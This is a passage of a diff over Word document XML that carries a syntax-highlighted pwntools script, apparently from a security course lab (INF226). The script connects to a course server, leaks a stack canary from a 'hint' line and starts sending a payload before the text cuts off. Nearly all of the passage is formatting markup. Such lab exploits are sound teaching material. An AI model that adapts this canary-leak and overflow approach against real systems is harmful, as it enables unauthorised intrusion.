-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>*</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="C586C0"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>from</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="4EC9B0"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>pwn</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="C586C0"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>import</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> p64</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="9CDCFE"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>io</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>=</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="4EC9B0"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>remote</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CE9178"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>'inf226.puffling.no'</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="B5CEA8"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>7002</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="9CDCFE"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>io</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="DCDCAA"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>recvuntil</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="569CD6"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>b</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CE9178"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>'? '</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="9CDCFE"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>io</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="DCDCAA"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>sendline</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="569CD6"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>b</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CE9178"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>'24'</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="9CDCFE"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>r</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>=</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="9CDCFE"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>io</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="DCDCAA"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>recvline</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>()</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="9CDCFE"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>canary</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>=</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="9CDCFE"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>r</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="DCDCAA"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>removeprefix</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="569CD6"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>b</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CE9178"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>"Here's a hint: "</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="9CDCFE"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>io</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="DCDCAA"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>recvline</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>()</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="9CDCFE"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>io</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="CCCCCC"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="DCDCAA"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>send</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
